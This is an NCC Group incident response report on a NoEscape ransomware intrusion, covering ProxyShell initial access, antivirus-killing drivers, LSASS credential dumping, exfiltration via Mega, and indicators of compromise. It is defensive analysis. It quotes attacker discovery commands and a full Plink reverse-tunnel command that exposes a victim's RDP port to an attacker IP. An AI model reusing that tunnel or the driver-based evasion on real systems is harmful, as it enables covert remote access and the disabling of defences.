Skip to navigation Skip to main content Skip to footer

Is this the real life? Is this just fantasy? Caught in a landslide, NoEscape from NCC Group


Author: Alex Jessop (@ThisIsFineChief)

Summary

Tl;dr

This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving the Ransomware-as-a-Service known as NoEscape.

Below provides a summary of findings which are presented in this blog post: 

  • Initial access gained via a publicly disclosed vulnerability in an externally facing server
  • Use of vulnerable drivers to disable security controls
  • Remote Desktop Protocol was used for Lateral Movement
  • Access persisted through tunnelling RDP over SSH
  • Exfiltration of data via Mega
  • Execution of ransomware via scheduled task

NoEscape

NoEscape is a new financially motivated ransomware group delivering a Ransomware-as-a-Service program which was first observed in May 2023 being advertised on a dark web forum, as published by Cyble [1]. It is believed they are a spin-off of the group that used to be known as Avaddon. This post will focus on the Tactics, Techniques and Procedures employed by a threat actor utilising NoEscape Ransomware in a recent Incident Response Engagement.

Review of the NoEscape dark web portal and their list of victims shows no trends in industries targeted which suggests they are opportunistic in nature. To date, 89 victims (18 active) have been posted on the NoEscape portal, with the first being published on 14th June 2023. Monetary gain is the main objective of this ransomware group. In addition to the usual double extortion method of ransomware and data exfiltration which has been popular in recent years, NoEscape also has a third extortion method: the ability to purchase a DDoS/Spam add on to further impact victims.

Incident Overview

NoEscape appear to target vulnerable external services, with the initial access vector being via the exploitation of a Microsoft Exchange server which was publicly facing in the victim’s environment. Exploitation led to webshells being created on the server and gave the threat actor an initial foothold into the environment.

The threat actor seemed opportunistic in nature, whose objective was monetary gain with a double extortion method of ransomware which included data exfiltration. However, they did appear low skilled due to a kitchen sink approach employed when trying to disable antivirus and dump credentials. Multiple different tools were deployed to enact the same job for the threat actor, which is quite a noisy approach often not observed by the more sophisticated threat actor.

A secondary access method was deployed to ensure continued access in the event that the initial access vector was closed to the threat actor. Data was exfiltrated to a well-known cloud storage provider, however this was interrupted due to premature execution of the ransomware which encrypted files that were being exfiltrated.

Timeline

  • T – Initial Access gained via webshell
  • T+1 min – Initial recon and credential dumping activity
  • T+9 min – Secondary access method established via Plink
  • T+18 days – Second phase of credential dumping activity
  • T+33 days – Data Exfiltration
  •  T+33 days – Ransomware Executed

Mitre TTPs

Initial Access

T1190 – Exploit Public-Facing Application

In keeping with the opportunistic nature, initial access was gained through exploiting the vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 which are more commonly known as ProxyShell.

WebShell were uploaded to the victims Microsoft Exchange server and gave the threat actor an initial foothold on the network.

Execution

T1059.001 – Command and Scripting Interpreter: PowerShell

PowerShell was utilised by the threat actor, using the Defender command Set-MpPreference to exclude specific paths from being monitored. This was an attempt to ensure webshells were not detected and remediated by the antivirus.

T1059.003 – Command and Scripting Interpreter: Windows Command Shell

Windows native commands were executed during the discovery phase; targeting domain admin users, antivirus products installed etc.

  • net  localgroup administrators
  • cmd.exe  /c net group \”REDACTED” /domain
  • cmd.exe  /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

T1053.005 – Scheduled Task

As has been well documented [2], a Scheduled Task with the name SystemUpdate was used to execute the ransomware.

Persistence 

T1505.003 – Server Software Component: Web Shell

Web Shells provided the threat actor continued access to the estate through the initial access vector.

Privilege Escalation

T1078.002 – Valid Accounts: Domain Accounts

Threat actor gained credentials for valid domain accounts which were used for the majority of lateral movement and execution

T1078.003 – Valid Accounts: Local Accounts

The threat actor was observed enabling the DefaultAccount and utilising this to execute their tools locally on a host.

Defence Evasion

T1562.001 – Impair Defences: Disable or Modify Tools

The threat actor showed their potential lack of experience as multiple different drivers were dropped in an attempt to disable the deployed EDR and AV. Instead of deploying a single driver, multiple drivers and tools were dropped in a ‘throw the kitchen sink at it’ approach.

FileDescription
Gmer.exeGMER is a rootkit detector and remover, utilised by threat actors to identify and kill processes such as antivirus and EDR
aswArPot.sysAn Avast antivirus driver deployed by threat actors to disable antivirus solutions.
mhyprot2.sysGenshin Impact anti-cheat driver which is utilised by threat actors to kill antivirus processes.

Credential Access

T1003 – Credential Dumping

Similar to the above, multiple credential dumping tools were dropped by the threat actor in an attempt to obtain legitimate credentials.

FileDescription
CSDump.exeUnknown dumping tool (no longer on disk)
Fgdump.exeA tool for mass password auditing of the Windows systems by dumping credentials from LSASS
MemoryDumper.exeCreates an encrypted memory dump from LSASS process to facilitate offline cracking of passwords hashes.

Discovery

T1087.001 – Account Discovery: Local Account

A number of inbuilt Windows commands were used to gain an understanding of the local administrators on the group:

net localgroup administrators

net group “REDACTED” /domain

T1018 – Remote System Discovery

Similarly, inbuilt Windows commands were also used to discover information on the network, such as the primary domain controller for the estate:

netdom query /d:REDACTED PDC

Lateral Movement

T1021.001 – Remote Desktop Protocol

Valid domain credentials were obtained through dumping the LSASS process, these accounts were then used to laterally move across the environment via RDP.

Command and Control

T1572 – Protocol Tunnelling

Secondary method of access was deployed by the threat actor, in the event that the initial access vector was closed, by deploying PuTTY link onto multiple hosts in the environment. A SSH tunnel was created to present RDP access to the host from a public IP address owned by the threat actor.

p64.exe REDACTED@172.93.181[.]238 -pw REDACTED -P 443 -2 -4 -T -N -C -R 0.0.0.0:10445:127.0.0.1:3389

T1219 – Remote Access Software

The threat actor also utilised software already deployed onto the estate to maintain access, in this scenario obtaining credentials to the TeamViewer deployment.

Exfiltration

T1048.002 – Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

As has become common when data is exfiltrated from a victims estate in recent years, the MegaSync.exe utility was used to exfiltrate data from the estate directly to Mega’s cloud storage platform.

Impact

T1486 – Data Encrypted for Impact

The encryptor targeted all files on the C:\ drive except those with the below extension:

bat, bin, cmd, com, cpl, dat, dll, drv, exe, hta, ini, lnk, lock, log, mod, msc, msi, msp, pif, prf, rdp, scr, shs, swp, sys, theme

IOC List

ValueTypeDescription
142D950E7DD975056BD3487672C14C26450D55C1SHA1Mega Sync
2F366382D2DB32AACA15F9CADC14C693B33C361FSHA1Ransomware binary
4709827c7a95012ab970bf651ed5183083366c79SHA1Putty Link
75DB5A0B47783B4E4C812CF521C3A443FACB6BBBSHA1Ransomware binary
BB3593007FE44993E102830EDC3255836A97FB01SHA1Ransomware binary
FB0A150601470195C47B4E8D87FCB3F50292BEB2SHA1PsExec
214551A8C07633D8C70F7BE4689EFE3BB74ABFD6E64264CF440100413EA6BE6BSHA256Mega Sync
53B5A02259C69AB213BA1458D7F70B01614CC32E040B849AD67FEFB07A725945SHA256Ransomware binary
828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924dSHA256Putty Link
078212DEA0C7FD9CDFA40DBB320B29900F4E8BA0E64D2199F6CAE0BC23D1C625SHA256Ransomware binary
2020CAE5115B6980D6423D59492B99E6AAA945A2230B7379C2F8AE3F54E1EFD5SHA256Ransomware binary
AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4SHA256PsExec
172.93.181[.]238IPMalicious IP used for tunnelling via Plink
66.203.125[.]14IPMega IP

MITRE ATT CK® 

Tactic Technique ID Description  
Initial AccessExploit Public-Facing ApplicationT1190The vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207, commonly known as ProxyShell, were exploited
ExecutionCommand and Scripting Interpreter: PowerShellT1059.001PowerShell was utilized to add an exclusion path to the anti-virus to prevent the web shells from being detected
ExecutionCommand and Scripting Interpreter: Windows Command ShellT1059.003Native Windows commands were utilised during the discovery phase of the endpoint and victim estate
ExecutionScheduled TaskT1053.005A scheduled task was utilised to execute the ransomware binary
PersistenceServer Software Component: Web ShellT1505.003Web Shells were uploaded to the Exchange server via exploitation of the ProxyShell vulnerabilities
Privilege EscalationValid Accounts: Domain AccountsT1078.002Credentials to domain accounts were obtained and utilised for lateral movement
Privilege EscalationValid Accounts: Local AccountsT1078.003A disabled local account was re-enabled by the threat actor and used.
Defence EvasionImpair Defenses: Disable or Modify ToolsT1562.001Tooling was deployed in an attempt to disable the deployed endpoint security controls
Credentials AccessCredential DumpingT1003Various different tools were deployed to dump credentials from LSASS
DiscoveryAccount Discovery: Local AccountT1087.001‘net’ native Windows command was utilised to discovery users in the domain administrator group
DiscoveryRemote System DiscoveryT1018‘netdom’ was utilised to discover the primary domain controller for the victims estate
Lateral MovementRemote Desktop ProtocolT1021.001The primary method of lateral movement was RDP
Command and ControlProtocol TunnellingT1572PuTTY link, also known as Plink, was used to tunnel RDP connections over SSH to provide the threat actor with direct access to the Exchange server as back-up to the web shells
Command and ControlRemote Access SoftwareT1219Access was gained to the existing TeamViewer deployment and utilised for lateral movement
ExfiltrationExfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 ProtocolT1048.002MegaSync was utilised to exfiltrate data to the cloud storage solution Mega
ImpactData Encrypted for ImpactT1486Ransomware was deployed across the estate

References

[1] – Cyble — ‘NoEscape’ Ransomware-as-a-Service (RaaS)

[2] – Meet NoEscape: Avaddon ransomware gang’s likely successor – RedPacket Security